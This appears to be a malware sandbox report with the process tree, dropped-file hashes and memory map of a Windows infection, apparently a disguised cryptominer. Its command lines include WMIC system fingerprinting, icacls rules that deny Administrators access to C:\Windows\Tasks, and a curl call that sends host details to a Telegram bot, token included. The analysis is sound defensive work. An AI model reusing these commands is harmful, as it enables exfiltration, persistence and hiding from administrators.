- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC CPU Get Name /Value5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exeFindStr .5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="4⤵
-
C:\Windows\SysWOW64\find.exeFIND.EXE "="5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC /Node:localhost Path Win32_VideoController Get Name /Value5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"4⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"4⤵
- Enumerates processes with tasklist
-
\??\c:\windows\curl.exec:\windows\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="TWJYXOULCORE2Intel Core Processor (Broadwell)Microsoft Basic Display AdapterSERVICE WMService RUN" "https://api.telegram.org/bot"5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM"/sendMessage"4⤵
- Executes dropped EXE
-
C:\windows\tasks\Wmiic.exeC:\windows\tasks\Wmiic.exe1⤵
- Executes dropped EXE
-
C:\windows\tasks\IntelConfigService.exe"IntelConfigService.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Windows\Tasks\Wrap.exeC:\Windows\Tasks\Wrap.exe3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized4⤵
-
C:\Windows\Tasks\ApplicationsFrameHost.exeC:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\Tasks /deny "TWJYXOUL$:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\Tasks\Superfetch.exeC:\Windows\Tasks\Superfetch.exe3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Windows\Tasks\MSTask.exeC:\Windows\Tasks\MSTask.exe3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\~MpDF78.tmp\~Ma4650.exe"C:\Windows\TEMP\~MpDF78.tmp\~Ma4650.exe" /p"C:\Windows\Tasks\MSTask.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\programdata\wininit.exeC:\programdata\wininit.exe --service1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\migrate.exeFilesize
6.6MB
MD527216b55a4915b7b0a845367bfe7be2b
SHA16e4599d5f5d981079902ac44dc002257af0f9f97
SHA25670df9144efd8eb4aac981ea0f4c2b71aa6e3165c93a1a1a17465c95a9eefc2d7
SHA5126b0895b7d84d0b706bf5bd6a3396e65f591d5de6291307805ab897f89ce0bb4fe835864d43cc8ac15c54494f218a2971ec13e589cc50c1ee9e7b04d32d2d9e00
-
C:\ProgramData\wininit.exeFilesize
3.0MB
MD55eb90fbd6a3a7717813147268893adb3
SHA14ee216a39f727f01c08ccbac3d7d756fa35369da
SHA2567cf373ee6f3c51395f32c24ada5ee4166ceeee295f8a701ab47531c63c1030fa
SHA5120aee3ecf0517b2545b79a38ce4ae789753eb68d818d115991c2bfa7c857bab3a964f02e538bd6ef3a4000fafafd2ca9cb60ff6fc4edca09eec673514ce78618a
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5e9438c233c4143409d34b8d653c7784d
SHA17c5e8794ba92152ed2d3b4d0e0277ae230477c4a
SHA256801cc2f56ff2c14dbf323212514348c9f17709deb625f1fb0b9b2923997bebe4
SHA5127f6dd2406ca7b49c685b07883ab815158662db2baf3250660329710c7fccdee9a328692027a920a2f8720a963087375d1d885ce288d313d83d0d87f4ceb25d11
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5e5110fe887aa824c9b9b0780445d1ebe
SHA11abf5209cbf53d1098bfe71257cd54920d7b9f1f
SHA256dd8da3f282c5b8e898a06e734ca236427a4e758dd2df2d62349ebe6c0546eb1b
SHA5122f81219ffec17a6ad4ab7ff062697640cbca29d356998934db1dd620c523f22d8d010169e95b0c5d6a7fe38a776f537a97db0ab2b78511e83df09f5aee977c91
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD5d40fbeb56e66c43e39910414bc1bdaf3
SHA1521225370d759587abd9cd0953dfd41f1d15416a
SHA256f727d407c91f0fb57a66102b3e6e913f6538733dfd7c6cab20bd6701089e4dba
SHA512a9e0d468b72192978864cf732a2e4ade0f12244f32b0cd3fc5c761f1d227dc1ada377a9ed8a6b9331a10e9df19d9fec939200c4d9aa99be14524a48252d145ed
-
C:\Windows\Migration\.tmpFilesize
92KB
MD58250794fe5e40794bacc05dd2350af96
SHA1d05fc6fae9476c0963e4a380e264801cf6e82e98
SHA25695b652c92d7d623633bb309ae5af35bb85128b6eef579da92545ecf87f18d4a5
SHA5120bdee284c8d4553fd9160e89f1db3964004af4f85381ab229900bea1a5ed1900f30e51d20d278c5c929159733b1cae0527d914bae93877eaa72a9fdaaf316c9e
-
C:\Windows\Migration\any.exeFilesize
3.3MB
MD5447be2890d99477c8237d3c72f69e442
SHA14b139f515cee56f20b084060a6dabf8830475e8d
SHA25620d3c10c49dcbd585d3481d3f0177e814ec3282e1b2bdd202f734005546f9b4c
SHA512fedcc9ab462e6376a35d3143a697dc0e038eb32d42da395be07a741501cfa7d299a119a608f47ebb36e1f767d1f45184994cc1d14397dfb24fdf08ec20f283a6
-
C:\Windows\TEMP\~MpDF78.tmp\PlayerAssistant.dllFilesize
64KB
MD51dff2e673c8801edcd8ded325a774c7f
SHA1d3c0e1eb71f1c22b825b3a798f154e586fbccdba
SHA256d08c2478fd924c69a7a3fc84e767d6e32feedda1d7ce3a8cd21eda32c2328003
SHA51204ce499e5a27c6c359d0ba62db2d90e2e129ca035e7d44e71ea7f44c2aaf9e6b8ee65a15af37157e24d22155d30a38dcd94650073caca9903ed7e42f44422d9f
-
C:\Windows\TEMP\~MpDF78.tmp\SureKeyboardState.dllFilesize
63KB
MD58110a3c2e92470944acf50dd71521eca
SHA19eef6d02b1d8afc5a560010ff0af34c8b2a4dd06
SHA25694fc90f9d35414bc718bb139f0dab566d2a711093d95e9c955c0603fd14b08f0
SHA51227603698274dd1cab8634e8b625704a7254ebffbb3c14e337964450ed2f149104168bcffd1b2f492f1c657f9fb61bf828b035fdc8aa8ef399781e34ff85f3793
-
C:\Windows\TEMP\~MpDF78.tmp\~Ma4650.exeFilesize
3.5MB
MD53c484fb37f284317f9f8bfca1a606591
SHA169960c91129a84effa4160babdb1e18d671b3a91
SHA2566ea403b319633f30b47502a46753d3c73885705e1b51838e9e26ab000b4d44df
SHA512315173777f42f594ddaec8e91de877fd1f79cb953bb09d3baefee715fa8b2bbd75cf8fa72b22d411df4e244fc1d318a5920d95510107ca436d0b1f7c2b099610
-
C:\Windows\Tasks\ApplicationsFrameHost.exeFilesize
8.4MB
MD59e02819c5e84a3d8ff67b8cd8ce46b7a
SHA1138948b1c856314768a066410800bf76909da4eb
SHA256dca683e92020e2f44762d4b3eb49e5d000d1f8b30f86b77d4b08ac351dc35637
SHA51254853bef6d435bcb19ff59f30dde8898124508e96ea333b382bea3bb9f26d4366537daca6a05799ddb257b94f8f7733cd9be99f3098631c372143574c002a3a6
-
C:\Windows\Tasks\ApplicationsFrameHost.exeFilesize
8.4MB
MD59e02819c5e84a3d8ff67b8cd8ce46b7a
SHA1138948b1c856314768a066410800bf76909da4eb
SHA256dca683e92020e2f44762d4b3eb49e5d000d1f8b30f86b77d4b08ac351dc35637
SHA51254853bef6d435bcb19ff59f30dde8898124508e96ea333b382bea3bb9f26d4366537daca6a05799ddb257b94f8f7733cd9be99f3098631c372143574c002a3a6
-
C:\Windows\Tasks\IntelConfigService.exeFilesize
1.8MB
MD558e4115267b276452edc1f541e3a8198
SHA1ec40b6cce5c9a835563c17da81997e8010ac9cad
SHA256713120bac7807f6fc0a6050135556c0614a66be2fb476cfe163877f3d03b4d08
SHA5123def4b7f7fbeab01826eb733174bca64860f8bfbad3baec361b65b07b4558e28830fcc2deb264622199f9474277f04e562830bc5f0bf8a0e7932d002f1a812c5
-
C:\Windows\Tasks\MSTask.exeFilesize
4.1MB
MD5815ac943fb14eb69d059299c89136de3
SHA1c4cedd22bf42f46da0dd19f57e0859554c5898e1
SHA2561670a91ec9d1bf2a75378d3c56c36a069ad628adbd6c8c6d3dd31691a1ca4c4d
SHA51265829e721f522f99d0cdb4ce64b6e03095c71a5dc8ba8ab409ec56b18e77ee2e96daa07dc11ea3df0e6d0aaee9b2461ad57f17c240a3ac145e257641a430dbe5
-
C:\Windows\Tasks\MSTask.exeFilesize
4.1MB
MD5815ac943fb14eb69d059299c89136de3
SHA1c4cedd22bf42f46da0dd19f57e0859554c5898e1
SHA2561670a91ec9d1bf2a75378d3c56c36a069ad628adbd6c8c6d3dd31691a1ca4c4d
SHA51265829e721f522f99d0cdb4ce64b6e03095c71a5dc8ba8ab409ec56b18e77ee2e96daa07dc11ea3df0e6d0aaee9b2461ad57f17c240a3ac145e257641a430dbe5
-
C:\Windows\Tasks\Superfetch.exeFilesize
1.6MB
MD5362ffce5c7c480702a615f1847191f62
SHA175aceaea1dfba0735212c2ab5cafc49257927f73
SHA2569e24c7b4604aa3022325b62154ac80dc76533fa96a3418d8e15d28c998fb9c53
SHA5129a71825a4e111c89e193f799f5cd0f38bf753137bf669040254eb5ecfbeb1e7fb161451320592832381b6ae7a95b015ef8e9192ab10ad41e113bad35dde7d15f
-
C:\Windows\Tasks\Superfetch.exeFilesize
1.6MB
MD5362ffce5c7c480702a615f1847191f62
SHA175aceaea1dfba0735212c2ab5cafc49257927f73
SHA2569e24c7b4604aa3022325b62154ac80dc76533fa96a3418d8e15d28c998fb9c53
SHA5129a71825a4e111c89e193f799f5cd0f38bf753137bf669040254eb5ecfbeb1e7fb161451320592832381b6ae7a95b015ef8e9192ab10ad41e113bad35dde7d15f
-
C:\Windows\Tasks\WinRing0x64.sysFilesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
C:\Windows\Tasks\Wmiic.exeFilesize
365KB
MD5a18bfe142f059fdb5c041a310339d4fd
SHA18ab2b0ddc897603344de8f1d4cc01af118a0c543
SHA256644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768
SHA512c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8
-
C:\Windows\Tasks\Wmiic.exeFilesize
365KB
MD5a18bfe142f059fdb5c041a310339d4fd
SHA18ab2b0ddc897603344de8f1d4cc01af118a0c543
SHA256644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768
SHA512c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8
-
C:\Windows\Tasks\Wmiic.exeFilesize
365KB
MD5a18bfe142f059fdb5c041a310339d4fd
SHA18ab2b0ddc897603344de8f1d4cc01af118a0c543
SHA256644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768
SHA512c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8
-
C:\Windows\Tasks\Wrap.exeFilesize
1.0MB
MD51006dab1f856d5dd0d143893af79dd96
SHA1debf139adfb779e519e1d3cb506794989aade417
SHA2565992923c30024991ab8af2d514224d1f282ce84b84b499dd490ce93f0b60593e
SHA512d989dc195c695bdb0e2343a5e677e36a818aa8d7a7228bc5cfc4aeb9bd6e33eb76bcaefc5476bfbc49bb78b27e1e9b221154b57c329ae6bda5fbccb090f5236e
-
C:\Windows\Tasks\Wrap.exeFilesize
1.0MB
MD51006dab1f856d5dd0d143893af79dd96
SHA1debf139adfb779e519e1d3cb506794989aade417
SHA2565992923c30024991ab8af2d514224d1f282ce84b84b499dd490ce93f0b60593e
SHA512d989dc195c695bdb0e2343a5e677e36a818aa8d7a7228bc5cfc4aeb9bd6e33eb76bcaefc5476bfbc49bb78b27e1e9b221154b57c329ae6bda5fbccb090f5236e
-
C:\Windows\Tasks\config.jsonFilesize
2KB
MD5539a1647d56a708ef272fb6e6dc44ce0
SHA14650663f175cee001f7007644064b9c3ee557e4a
SHA256a7e5316f965df9c2d1fd93ff3effb69f6dd4a416e6ba38e6f3644cb74b4a308b
SHA51254ab7feec62eb812de9de32f59b583cfbf9878a55e1378878fe0b7def85418102b2daa592b98c142cfddec7c53c5f80ce99c52e29be61567195514976550bcd9
-
C:\Windows\Temp\~MpDF78.tmp\PlayerAssistant.dllFilesize
64KB
MD51dff2e673c8801edcd8ded325a774c7f
SHA1d3c0e1eb71f1c22b825b3a798f154e586fbccdba
SHA256d08c2478fd924c69a7a3fc84e767d6e32feedda1d7ce3a8cd21eda32c2328003
SHA51204ce499e5a27c6c359d0ba62db2d90e2e129ca035e7d44e71ea7f44c2aaf9e6b8ee65a15af37157e24d22155d30a38dcd94650073caca9903ed7e42f44422d9f
-
C:\Windows\Temp\~MpDF78.tmp\SureKeyboardState.dllFilesize
63KB
MD58110a3c2e92470944acf50dd71521eca
SHA19eef6d02b1d8afc5a560010ff0af34c8b2a4dd06
SHA25694fc90f9d35414bc718bb139f0dab566d2a711093d95e9c955c0603fd14b08f0
SHA51227603698274dd1cab8634e8b625704a7254ebffbb3c14e337964450ed2f149104168bcffd1b2f492f1c657f9fb61bf828b035fdc8aa8ef399781e34ff85f3793
-
C:\Windows\Temp\~MpDF78.tmp\gslib_ui_defresu.dllFilesize
250KB
MD53fa6b348f74d0099fc30f9e383a9ada7
SHA1880360ed156fc6cb31f8f4538b5df47974e1472e
SHA2563fd5732a89604bfde4c49836e05cff838cd9bc489a4b901daf22acf55b28f4dc
SHA51271fa40ab547ce941870a64c90e7113c4a8e650ec07909416562575afeff55429e9d61d308ff2a8993d28cce336811c6ede5d8255d07ab283d7a11e03cf744c4a
-
C:\Windows\Temp\~MpDF78.tmp\~Ma4650.exeFilesize
3.5MB
MD53c484fb37f284317f9f8bfca1a606591
SHA169960c91129a84effa4160babdb1e18d671b3a91
SHA2566ea403b319633f30b47502a46753d3c73885705e1b51838e9e26ab000b4d44df
SHA512315173777f42f594ddaec8e91de877fd1f79cb953bb09d3baefee715fa8b2bbd75cf8fa72b22d411df4e244fc1d318a5920d95510107ca436d0b1f7c2b099610
-
C:\Windows\curl.exeFilesize
5.2MB
MD5104023cef829fce3e34bf1514daff629
SHA1b6e7b949109298ec7ff1aa64404a859b5b41ccae
SHA25615b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5
SHA512efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e
-
C:\programdata\ru.batFilesize
32B
MD511e08b5abf3f1675f99c96f78c128b23
SHA140d6dd08262ef959328aec4dc5ed07532232037c
SHA25650ac09332ff9d6521244b4f9cf6fd9cc489b3324ed1316e07f6a5904230397e7
SHA5123005767016b4c5da031fb2ac5288b01821d54768b5e099e1157d4fa4621a078d589e54d9c5c89ded58ac3ca94395dacbf1d840f9210f909d3c9dfe8092de8ff9
-
C:\programdata\wininit.exeFilesize
3.0MB
MD55eb90fbd6a3a7717813147268893adb3
SHA14ee216a39f727f01c08ccbac3d7d756fa35369da
SHA2567cf373ee6f3c51395f32c24ada5ee4166ceeee295f8a701ab47531c63c1030fa
SHA5120aee3ecf0517b2545b79a38ce4ae789753eb68d818d115991c2bfa7c857bab3a964f02e538bd6ef3a4000fafafd2ca9cb60ff6fc4edca09eec673514ce78618a
-
C:\windows\migration\any.batFilesize
1KB
MD5820e231cced7dd284bca641bae7e4f7f
SHA184006f6aa9eb42dcbf5561b4a581c83e15e9058a
SHA2561c6c567df282f77e51b4fe86cec37e8a9910374a6196216a55d35a674478ed25
SHA51214e056b01061bc665f9ead489bc42cb201b846cc05ff9a3172ad22a1d106d31a25a6edf48eb841aa516ced60d105d5495bd00b89bef71661f15d7b9a2953e87f
-
C:\windows\tasks\IntelConfigService.exeFilesize
1.8MB
MD558e4115267b276452edc1f541e3a8198
SHA1ec40b6cce5c9a835563c17da81997e8010ac9cad
SHA256713120bac7807f6fc0a6050135556c0614a66be2fb476cfe163877f3d03b4d08
SHA5123def4b7f7fbeab01826eb733174bca64860f8bfbad3baec361b65b07b4558e28830fcc2deb264622199f9474277f04e562830bc5f0bf8a0e7932d002f1a812c5
-
C:\windows\tasks\Wmiic.exeFilesize
365KB
MD5a18bfe142f059fdb5c041a310339d4fd
SHA18ab2b0ddc897603344de8f1d4cc01af118a0c543
SHA256644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768
SHA512c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8
-
C:\windows\tasks\run.batFilesize
489B
MD58098a70564ca959e392fea0b77e05b6f
SHA14f7943d6e30839293cbe1dc0dc4dbd5fb3fc1d78
SHA25647cd7dd51cad3ebc215d3ee835c2f0a4ea9785300e03cd3e6b4ea1195c557807
SHA512b5d610564d8af52648b2cbb83fc94b48393a68e71f15ab8f56e5c0063aa0034ec37943e36160a1770cf538d799eb92e55b83332fde1a82b11ada92220fc5c8f3
-
\??\c:\Programdata\anydesk\ad_svc.traceFilesize
92KB
MD58250794fe5e40794bacc05dd2350af96
SHA1d05fc6fae9476c0963e4a380e264801cf6e82e98
SHA25695b652c92d7d623633bb309ae5af35bb85128b6eef579da92545ecf87f18d4a5
SHA5120bdee284c8d4553fd9160e89f1db3964004af4f85381ab229900bea1a5ed1900f30e51d20d278c5c929159733b1cae0527d914bae93877eaa72a9fdaaf316c9e
-
\??\c:\programdata\migrate.exeFilesize
6.6MB
MD527216b55a4915b7b0a845367bfe7be2b
SHA16e4599d5f5d981079902ac44dc002257af0f9f97
SHA25670df9144efd8eb4aac981ea0f4c2b71aa6e3165c93a1a1a17465c95a9eefc2d7
SHA5126b0895b7d84d0b706bf5bd6a3396e65f591d5de6291307805ab897f89ce0bb4fe835864d43cc8ac15c54494f218a2971ec13e589cc50c1ee9e7b04d32d2d9e00
-
\??\c:\programdata\st.batFilesize
3KB
MD5a4355470a8f18c272559306aeb81d7c7
SHA1d38b25db4da4a14bbc77b01460dd2e4e938badb0
SHA256109a5870e28ce94a7addff3a35ab4291ada7d7be87befed1edca2f729437ac08
SHA512b8c2c5259b448f847b883ca7b13c4d92c896148d15eb5ee8c7f3084bf8b7a75af722f6cdbeabe1a6c67346d2958ddece6d7d568d39d70df2135f7514393ab94a
-
\??\c:\windows\migration\any.exeFilesize
3.3MB
MD5447be2890d99477c8237d3c72f69e442
SHA14b139f515cee56f20b084060a6dabf8830475e8d
SHA25620d3c10c49dcbd585d3481d3f0177e814ec3282e1b2bdd202f734005546f9b4c
SHA512fedcc9ab462e6376a35d3143a697dc0e038eb32d42da395be07a741501cfa7d299a119a608f47ebb36e1f767d1f45184994cc1d14397dfb24fdf08ec20f283a6
-
\??\c:\windows\migration\wininit.exeFilesize
3.0MB
MD55eb90fbd6a3a7717813147268893adb3
SHA14ee216a39f727f01c08ccbac3d7d756fa35369da
SHA2567cf373ee6f3c51395f32c24ada5ee4166ceeee295f8a701ab47531c63c1030fa
SHA5120aee3ecf0517b2545b79a38ce4ae789753eb68d818d115991c2bfa7c857bab3a964f02e538bd6ef3a4000fafafd2ca9cb60ff6fc4edca09eec673514ce78618a
-
\??\c:\windows\temp\~mpdf78.tmp\gslib_ui_defresu.dllFilesize
250KB
MD53fa6b348f74d0099fc30f9e383a9ada7
SHA1880360ed156fc6cb31f8f4538b5df47974e1472e
SHA2563fd5732a89604bfde4c49836e05cff838cd9bc489a4b901daf22acf55b28f4dc
SHA51271fa40ab547ce941870a64c90e7113c4a8e650ec07909416562575afeff55429e9d61d308ff2a8993d28cce336811c6ede5d8255d07ab283d7a11e03cf744c4a
-
memory/384-158-0x0000000000000000-mapping.dmp
-
memory/460-246-0x00000000000B0000-0x0000000000CE2000-memory.dmpFilesize
12.2MB
-
memory/460-244-0x00000000000B0000-0x0000000000CE2000-memory.dmpFilesize
12.2MB
-
memory/808-167-0x0000000000000000-mapping.dmp
-
memory/908-199-0x0000000000000000-mapping.dmp
-
memory/912-197-0x0000000000000000-mapping.dmp
-
memory/924-204-0x0000000000000000-mapping.dmp
-
memory/1092-155-0x0000000070600000-0x000000007064C000-memory.dmpFilesize
304KB
-
memory/1092-152-0x0000000000000000-mapping.dmp
-
memory/1100-213-0x0000000000000000-mapping.dmp
-
memory/1396-240-0x0000000000000000-mapping.dmp
-
memory/1416-193-0x0000000000000000-mapping.dmp
-
memory/1480-165-0x0000000000000000-mapping.dmp
-
memory/1528-235-0x0000000000000000-mapping.dmp
-
memory/1580-195-0x0000000000000000-mapping.dmp
-
memory/1616-181-0x0000000000000000-mapping.dmp
-
memory/1672-179-0x0000000000000000-mapping.dmp
-
memory/1856-242-0x0000000000000000-mapping.dmp
-
memory/1940-229-0x0000000000000000-mapping.dmp
-
memory/1944-175-0x0000000000000000-mapping.dmp
-
memory/2008-211-0x0000000000000000-mapping.dmp
-
memory/2052-196-0x0000000000000000-mapping.dmp
-
memory/2068-160-0x0000000000000000-mapping.dmp
-
memory/2156-178-0x0000000000000000-mapping.dmp
-
memory/2180-182-0x0000000000000000-mapping.dmp
-
memory/2180-250-0x0000000000000000-mapping.dmp
-
memory/2240-232-0x0000000000000000-mapping.dmp
-
memory/2296-151-0x0000000000000000-mapping.dmp
-
memory/2376-231-0x0000000000000000-mapping.dmp
-
memory/2440-239-0x0000000000000000-mapping.dmp
-
memory/2476-164-0x0000000000000000-mapping.dmp
-
memory/3100-249-0x0000000000000000-mapping.dmp
-
memory/3100-230-0x0000000000000000-mapping.dmp
-
memory/3312-168-0x0000000000000000-mapping.dmp
-
memory/3360-163-0x0000000000000000-mapping.dmp
-
memory/3516-254-0x0000000000000000-mapping.dmp
-
memory/3568-190-0x0000000000000000-mapping.dmp
-
memory/3616-173-0x0000000000000000-mapping.dmp
-
memory/3632-198-0x0000000000000000-mapping.dmp
-
memory/3648-228-0x000001FADCDC0000-0x000001FADCE00000-memory.dmpFilesize
256KB
-
memory/3648-258-0x000001FAED200000-0x000001FAED220000-memory.dmpFilesize
128KB
-
memory/3648-200-0x0000000000000000-mapping.dmp
-
memory/3648-203-0x000001FADCD80000-0x000001FADCDA0000-memory.dmpFilesize
128KB
-
memory/3652-251-0x0000000000000000-mapping.dmp
-
memory/3796-162-0x0000000000000000-mapping.dmp
-
memory/3828-188-0x0000000000000000-mapping.dmp
-
memory/3880-176-0x0000000000000000-mapping.dmp
-
memory/3944-156-0x0000000000000000-mapping.dmp
-
memory/4048-137-0x00000000066A0000-0x00000000066D2000-memory.dmpFilesize
200KB
-
memory/4048-132-0x00000000053E0000-0x0000000005A08000-memory.dmpFilesize
6.2MB
-
memory/4048-134-0x0000000005A10000-0x0000000005A76000-memory.dmpFilesize
408KB
-
memory/4048-144-0x0000000007600000-0x000000000760E000-memory.dmpFilesize
56KB
-
memory/4048-146-0x00000000076F0000-0x00000000076F8000-memory.dmpFilesize
32KB
-
memory/4048-135-0x0000000005AF0000-0x0000000005B56000-memory.dmpFilesize
408KB
-
memory/4048-143-0x0000000007650000-0x00000000076E6000-memory.dmpFilesize
600KB
-
memory/4048-130-0x0000000000000000-mapping.dmp
-
memory/4048-136-0x00000000060D0000-0x00000000060EE000-memory.dmpFilesize
120KB
-
memory/4048-133-0x0000000005220000-0x0000000005242000-memory.dmpFilesize
136KB
-
memory/4048-145-0x0000000007710000-0x000000000772A000-memory.dmpFilesize
104KB
-
memory/4048-138-0x000000006F0E0000-0x000000006F12C000-memory.dmpFilesize
304KB
-
memory/4048-131-0x0000000002C40000-0x0000000002C76000-memory.dmpFilesize
216KB
-
memory/4048-142-0x0000000007440000-0x000000000744A000-memory.dmpFilesize
40KB
-
memory/4048-139-0x0000000006660000-0x000000000667E000-memory.dmpFilesize
120KB
-
memory/4048-140-0x0000000007A10000-0x000000000808A000-memory.dmpFilesize
6.5MB
-
memory/4048-141-0x00000000073D0000-0x00000000073EA000-memory.dmpFilesize
104KB
-
memory/4196-172-0x0000000000000000-mapping.dmp
-
memory/4236-157-0x0000000000000000-mapping.dmp
-
memory/4236-186-0x0000000000000000-mapping.dmp
-
memory/4444-184-0x0000000000000000-mapping.dmp
-
memory/4460-241-0x0000000000000000-mapping.dmp
-
memory/4480-174-0x0000000000000000-mapping.dmp
-
memory/4480-214-0x0000000000000000-mapping.dmp
-
memory/4516-201-0x0000000000000000-mapping.dmp
-
memory/4696-147-0x0000000000000000-mapping.dmp
-
memory/4696-248-0x0000000000000000-mapping.dmp
-
memory/4712-171-0x0000000000000000-mapping.dmp
-
memory/4716-236-0x0000000000000000-mapping.dmp
-
memory/4892-166-0x0000000000000000-mapping.dmp
-
memory/4952-159-0x0000000000000000-mapping.dmp
-
memory/4972-177-0x0000000000000000-mapping.dmp
-
memory/4992-149-0x0000000000000000-mapping.dmp
-
memory/5048-161-0x0000000000000000-mapping.dmp
-
memory/5084-227-0x0000000000000000-mapping.dmp
-
memory/5084-253-0x0000000000000000-mapping.dmp
-
memory/5092-217-0x0000000000000000-mapping.dmp
-
memory/5116-226-0x0000000000000000-mapping.dmp